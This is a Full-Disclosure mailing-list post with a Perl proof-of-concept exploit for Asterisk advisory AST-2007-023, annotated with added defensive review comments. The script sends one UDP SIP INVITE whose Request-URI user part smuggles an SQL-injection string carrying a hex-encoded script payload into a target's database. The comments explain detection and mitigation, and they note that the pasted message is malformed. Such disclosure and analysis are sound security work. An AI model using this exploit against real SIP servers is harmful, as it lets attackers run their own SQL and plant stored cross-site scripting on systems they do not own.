
AST-2007-023-poc.txt

Posted on 19 October 2007

for testing purposes the POC of the vulnerabiliy discovered by the KIPH fuzzer RS
#!/usr/bin/perl
#############################################
# Vulnerabily discovered using KiF ~ Kiph   #
#                                           #
# Authors:                                  #
#   Humberto J. Abdelnur (Ph.D Student)     #
#   Radu State (Ph.D)                       #
#   Olivier Festor (Ph.D)                   #
#                                           #
# Madynes Team, LORIA - INRIA Lorraine      #
# http://madynes.loria.fr                   #
#############################################
#
# Review notes (defensive reading of this proof of concept):
#
#   What the listing does: builds one SIP INVITE (with an SDP body) and sends
#   it as a single UDP datagram to <targetIP>:<targetPort>.  The Request-URI
#   user part is an SQL-injection string: a closing single quote, a run of
#   extra VALUES-style columns, a `0x...` hex literal carrying the bytes of
#   "<script>alert(1)</script>", then "/*" to comment out whatever the
#   vulnerable statement appends after it.  The page title ties the listing to
#   Asterisk advisory AST-2007-023; the affected module is not named here.
#
#   Risk: a SIP endpoint that places the caller-supplied URI user part into an
#   SQL statement by string concatenation executes attacker-chosen SQL; the
#   embedded hex literal additionally stores an HTML/JS fragment, which would
#   only matter if a reporting UI later renders that column unescaped.
#
#   Detection: an INVITE whose Request-URI, From or To user part contains a
#   quote character, a `/*` sequence or a `0x` hex literal is not a legitimate
#   user name; such requests can be logged/blocked at the SIP edge (SBC, SIP
#   ALG, IDS rule on UDP 5060).
#
#   Mitigation: the backend must escape or parameterize every value taken from
#   signalling before it reaches SQL; operators apply the Asterisk release that
#   the advisory designates as fixed.
#
#   Code-level observations (the code below is left byte-identical):
#     - no `use strict` / `use warnings`; every variable is a package global.
#     - String::Random is a CPAN module, not core.
#     - line breaks inside the SDP and SIP string literals were collapsed to
#       spaces in this paste; they are kept exactly as they appear on the page,
#       so what this listing emits is not a well-formed SIP message.
#
use IO::Socket::INET;
use String::Random;

# Indirect-object syntax (`new Class`); equivalent intent is String::Random->new.
$foo = new String::Random;

# Only the 6th positional argument is tested for truthiness; the other five
# are not checked at all (and a local port of "0" would fail this test).
die "Usage $0 <callUser> <targetIP> <targetPort> <attackerUser> <localIP> <localPort>" unless ($ARGV[5]);

# Convert each byte of the argument to its lowercase hex representation.
# Note `%lx` is unpadded: a byte below 0x10 yields a single hex digit, so the
# output is not always two digits per input byte.  The `($)` prototype forces
# scalar context on the single argument.
sub iso2hex($) {
    my $hex = '';
    for (my $i = 0; $i < length($_[0]); $i++) {
        my $ordno = ord substr($_[0], $i, 1);
        $hex .= sprintf("%lx", $ordno);
    }
    # Strips one trailing space; `%lx` never emits a space, so this never
    # matches.  The doubled `;;` is an empty statement.
    $hex =~ s/ $//;;
    # Implicit return of the last evaluated expression.
    $hex;
}

# Positional arguments; none are validated (no IP/port/format checks).
$callUser = $ARGV[0];
$targetIP = $ARGV[1];
$targetPort = $ARGV[2];
$attackerUser = $ARGV[3];
$attackerIP= $ARGV[4];
$attackerPort= $ARGV[5];

# UDP socket bound locally to $attackerPort, peer set to the target.
# NOTE(review): this mixes indirect-object `new` with an explicit `->new(...)`;
# which call sequence Perl actually resolves this to is a known ambiguity of
# indirect-object syntax -- confirm before relying on it.  The result is not
# checked for undef.
$socket=new IO::Socket::INET->new( Proto=>'udp', PeerPort=>$targetPort, PeerAddr=>$targetIP, LocalPort=>$attackerPort);

# Hex form of the HTML/JS fragment that is smuggled in as a `0x...` literal.
$scriptinjection= iso2hex("<script>alert(1)</script>");

# The injection string placed in the Request-URI user part: closes the quoted
# value, supplies 11 further columns (one of them the hex literal above) and
# opens a block comment so the remainder of the server's statement is ignored.
$sqlinjection= "',1,2,3,4,5,-9,-9,0x$scriptinjection,6,7,8)/*";

# Random Call-ID token and CSeq number.  In String::Random's default pattern
# alphabet `C`/`c`/`n` stand for upper-case letter / lower-case letter / digit.
# NOTE(review): randregex() interprets its argument as a regex; whether a bare
# `dddd` (as opposed to `\d\d\d\d`) yields four digits or literal text depends
# on the module's pattern grammar -- not confirmable from this page.
$callid= $foo->randpattern("CCccnCn");
$cseq = $foo->randregex('dddd');

# SDP body (line structure lost in this paste; literal kept verbatim).
# Advertises RTP audio on port 49152 with several codecs.
$sdp = "v=0 o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP s=- c=IN IP4 $attackerIP t=0 0 m=audio 49152 RTP/AVP 96 0 8 97 18 98 13 a=sendrecv a=ptime:20 a=maxptime:200 a=fmtp:96 mode-change-neighbor=1 a=fmtp:18 annexb=no a=fmtp:98 0-15 a=rtpmap:96 AMR/8000/1 a=rtpmap:0 PCMU/8000/1 a=rtpmap:8 PCMA/8000/1 a=rtpmap:97 iLBC/8000/1 a=rtpmap:18 G729/8000/1 a=rtpmap:98 telephone-event/8000/1 a=rtpmap:13 CN/8000/1 ";

# Content-Length value: `length` counts characters; the body is ASCII here, so
# this equals the byte count.
$sdplen= length $sdp;

# The INVITE request line and headers (line structure lost in this paste).
# NOTE(review): inside a double-quoted string `@$targetIP`, `@$attackerIP`
# are array dereferences, not a literal "@" followed by the host; with no
# `strict` in effect each resolves through a symbolic reference to an empty
# array.  The bytes that reach the wire at those spots should therefore be
# confirmed with a packet capture rather than read off the source.
$msg = "INVITE sip:$sqlinjection@$targetIP SIP/2.0 Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1;rport From: <sip:$attackerUser@$attackerIP>;tag=1 To: <sip:$callUser@$targetIP> Call-ID: $callid@$attackerIP CSeq: $cseq INVITE Max-Forwards: 70 Contact: <sip:$attackerUser@$attackerIP> Content-Type: application/sdp Content-Length: 
$sdplen $sdp";

# Single datagram; the return value of send() is not examined and no response
# is read.  The script ends here.
$socket->send($msg);
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

 
